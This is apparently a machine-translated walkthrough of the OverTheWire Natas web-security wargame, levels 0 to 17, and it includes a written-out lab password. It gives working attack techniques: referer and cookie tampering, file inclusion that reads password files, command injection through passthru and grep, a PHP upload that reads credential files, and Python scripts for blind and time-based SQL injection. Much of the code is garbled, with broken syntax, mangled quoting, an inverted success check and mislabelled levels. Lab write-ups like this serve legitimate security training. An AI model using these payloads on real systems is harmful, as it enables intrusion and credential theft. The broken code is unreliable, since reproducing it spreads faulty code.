Level0:
This level is the first level of Natas, open it in the browser
natas0.natas.labs.overthewire.org
And enter username natas0, password natas0. Right-click on the website interface -> view the source code of the web page, and you can see the password to the next level.
Level0 -> Level1:
This level disables the right-click function of the mouse, click the F12 key, open the developer tools, and click the source code to see it.
Level1 -> Level2:
Right-click -> view the source code of the webpage, and find that there is no obvious password prompt. Observe carefully and find the file path files/pixel.png, open it in the browser
natas2.natas.labs.overthewire.org/files
You can see the user.txt file, and you can get the password to the next level by viewing the file.
Level2 -> Level3:
Right-click -> view the source code of the webpage, and found nothing, but at this time, a line of words caught our attention, and Google could not find this website.
When a crawler collects web page information, it first checks the robot.txt file of the web page to obtain content information that can be crawled from it. Let’s try to see what information is in this file! open in browser
natas3.natas.labs.overthewire.org/robot.txt
We can see the /s3cr3t/ folder, open it in the browser and we can see the password.
Level3 -> Level4:
Open the website and find that it says “Only websites accessed from http://natas5.natas.labs.overthewire.org/ can see the password”, and the source is indicated in the refer field of http, so we need to modify the value of this field as above URL of the . Here we use the tool burpsuite. Open burpsuite and start packet capture, configure the proxy in the browser, and import the CA certificate of burpsuite. Intercept the request sent by the browser, modify the value in the refer field to the above URL, and click Forward to see the password. 
Level4 -> Level5:
Open the website and find that it is displayed as login, use burpsuite to view the captured package, find that loggin=0 appears in the cookie, change it to loggin=1, and you can see the password
Level5 -> Level6:
Open the website, you need to enter the secret to display the password, click on the source code, and find a file include/secret.inc, the browser accesses this file, it is a blank interface, right click on this blank interface to view the source code of the webpage, you can see the secret , enter to see the password.
http://natas6.natas.labs.overthewire.org/includes/secret.inc
Level6 -> Level7:
Open the website and view the source code of the webpage, and find that there is a line of prompts. The idea of solving the problem is to access the file and obtain the content. At this time, observe the url and find that it contains a page= field. Try to use page=/etc/natas_webpass/natas8 to see it password.
Level7 -> Level8:
This question is similar to Level5 -> Level6, the difference is that we need to decode $encodedSecret, and run the following php code to get the secret.
<!DOCTYPE html> <html> <body> <?php $encodedSecret = "3d3d516343746d4d6d6c315669563362"; echo base64_decode(strrev(hex2bin($encodedSecret))); ?> </body> </html>
Leval8 -> Level9:
Check the source code of this webpage, you can find that the passthru function is called, this function will execute the command we passed in, and return the result, you can use this function to get the password, enter 123 dictionary.txt | cat / in Find words containing etc/natas_webpass/natas10 to print the password.
Level9 -> Level10:
Viewing the source code of this webpage, we can find that our input has been checked, and characters such as | cannot be used at this time. The grep command can use regular expressions to match the characters we need. Using this feature, we can easily get passwords. Enter ./etc/natas_webpass/natas11 # in Find words containing. . means to match any character, and # means to truncate the command.
Level10 -> Level11:
Check the source code of the webpage and find that it contains a lot of php content. Check the loadData function and find that it contains the $_COOKIE[“data”] field. Combined with “showpassword”=>”no” in $defaultdata, it is speculated that the Find a way to change no to yes. Click f12 to open the developer tools, click storage, check the cookie, and find that it contains a data field. Carefully observe the saveData function, base64_encode(xor_encrypt(json_encode($d))) is the process of generating the data field, and by reverse decoding the above, you can see the true colors of the data. 
Note that the xor_encrypt function essentially performs an xor operation. The xor operation has a property, a xor b = c, c xor b = a, that is, a xor b xor b = a. Why should we consider this? In the xor_encrypt function, the $key field is used. We must know what it is in order to change the no in “showpassword”=>”no” to yes. After knowing this principle, we can get $key through the following code.
<?php
$cookie = ''; # data field in cookie
$defaultdata = array( "showpassword"=>"no", "bgcolor"=>"#ffffff");
function xor_decrypt($in) {
$key = '';
$text = $in;
$outText = json_encode($defaultdata);
// Iterate through each character
for($i=0;$i<strlen($text);$i + + ){
$key .= $text[$i] ^ $outText[$i % strlen($outText)];
}
return $key;
}
echo xor_decrypt(base64_decode($cookie));
?>
Then get the cookie through the following code
<?php
$data = array( "showpassword"=>"yes", "bgcolor"=>"#ffffff");
function xor_encrypt($in) {
$key = ''; # key
$text = $in;
$outText = '';
// Iterate through each character
for($i=0;$i<strlen($text);$i + + ) {
$outText .= $text[$i] ^ $key[$i % strlen($key)];
}
return $outText;
}
echo base64_encode(xor_encrypt(json_encode($data)));
?>
Just replace the data in the cookie with the output result.
Level11 -> Level12:
Checking the source code of the webpage, it is found that the main function is to modify the name of the uploaded file (to .jpg), and then upload it to the server, without verifying the file type. So we upload a php file, read the password in the file, and display it. Then use burpsuite to capture packets and modify the file format.
# php file content
<?php
$myfile = fopen("/etc/natas_webpass/natas13", "r") or die("Unable to open file!");
echo fread($myfile,filesize("/etc/natas_webpass/natas13"));
fclose($myfile);
?>
Modify the jpg in filename to php
Level12 -> Level13:
Similar to Level11 -> Level12, except that the exif_imagetype function is added to judge whether the uploaded file is an image. exif_imagetype is to read the first byte of an image and check its signature. Add GIF89a to the file header to fool exif_imagetype. Can.
Level13 -> Level14:
Check the source code of the webpage and find that the sql statement “SELECT * from users where username=””.$_REQUEST[“username”].”” and password=”\ “.$_REQUEST[“password”].”””, we can consider using sql injection to get the password. Fill in 1″ or 1=1 # in username, and the statement executed by sql at this time is SELECT * from users where username=1 or 1=1 # , and the number of returned data entries must be greater than 0.
Level14 -> Level15:
Check the source code of the webpage, and find that there are sql statements, and the username is not checked. You can consider using sql injection to obtain the password. Note here that, unlike the previous problem-solving ideas, we need to construct a password for this problem, and then put it in sql In the statement, check whether the password is correct.
How to construct a password? Through the password observation of the previous questions, we found that the password should be composed of uppercase and lowercase letters and data, and the length is 32 bits. Verify, and then use the idea of half-search, so each password needs at most 6 times to verify successfully, and at most 6*32 times.
The verified code is as follows
#!/usr/bin/env python
import requests
url = 'http://natas15.natas.labs.overthewire.org/index.php'
username='natas15'
password= ''
key = ""
for pos in range(1, 33): # 32 digit password
low = 48 # here use ascii code to search, the smallest ascii is 48
high = 122 # The maximum ascii is 48
mid = (high + low)>>1 # search in half
while mid<high:
# Take a password in the password field each time, and finally use "" like " to close the sql statement
payload= "natas16" and %d < ascii(mid(password,%d,1)) and "" like "" % (mid, pos)
req = requests. post(url, auth = requests. auth. HTTPBasicAuth(username, password), data={"username":payload})
if req.text.find("doesn't exist"):
high=mid
else:
low = mid + 1
mid = (high + low)>>1
key + =chr(mid)
print(key)
Level15 -> Level16:
Check the source code of the web page, and find that the input characters are verified and surrounded by “””, which prevents us from directly performing sql injection as before.
First of all, we need to break through the limitation of ” “. Considering that this is using the php language, a feature of the php language is that the statement surrounded by $() can be executed directly, so even if you use ” \ ” Surrounding $() can also be executed.
Next, consider how to obtain the password. There are some characters in dictionary.txt. When our input can match the content in dictionary.txt, our input can be printed out. Using this, we can construct a combination of ” character c + a word ” in dictionary.txt to obtain the password.
The specific principle is: first use $(grep xxx /etc/natas_webpass/natas17) to obtain a character in the password, when xxx is in the password, $(grep xxx /etc/natas_webpass/natas17) returns not empty, this When xxx is concatenated with a word in dictionary.txt, it cannot be found in dictionary.tx; and when xxx is not in the password, $(grep xxx /etc/natas_webpass/natas17) returns empty, At this time, splicing xxx and a word in dictionary.txt and looking it up in dictionary.tx can be found.
Using this difference, we can query the password by traversing.
import requests
chars = '0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ'
password = ''
target = 'http://natas16.natas.labs.overthewire.org/'
username='natas16'
pas= '' # your password
# A total of 32 characters for the password
for i in range(32):
for c in chars:
# Construct url
url = target + '?needle=$(grep ^' + password + c + ' /etc/natas_webpass/natas17)African'
r = requests. get(url, auth = requests. auth. HTTPBasicAuth(username, pas))
# When the password is found
if r.text.find('African') == -1:
password += c
print('Password: ' + password + '*' * int(32 - len(password)))
break
Level16 -> Level17:
This level is similar to Level14 -> Level15, the difference is that whether it is hit or not will not be displayed on the screen. At this time, consider the time blind injection, that is, the hit is delayed for a while, and the hit is returned immediately, and the time difference is used to determine whether it is a hit. The code idea is the same as Level14 -> Level15.
import requests
url = 'http://natas17.natas.labs.overthewire.org/index.php'
username='natas17'
password= 'XkEuChE0SbnKBvH1RU7ksIb9uuLmI7sd'
key = ""
for pos in range(1, 33): # 32 digit password
low = 48 # here use ascii code to search, the smallest ascii is 48
high = 122 # The maximum ascii is 48
mid = (high + low)>>1 # search in half
while mid<high:
# Take a password in the password field each time, and finally use "" like " to close the sql statement
payload= "natas18" and if(%d < ascii(mid(password,%d,1)), sleep(2), 1) and "" like "\ " % (mid, pos)
try:
req = requests. post(url, auth = requests. auth. HTTPBasicAuth(username, password), data={"username":payload}, timeout=2)
except requests.exceptions.Timeout:
low = mid + 1
mid = (high + low)>>1
continue
high=mid
mid = (high + low)>>1
key + =chr(mid)
print(key)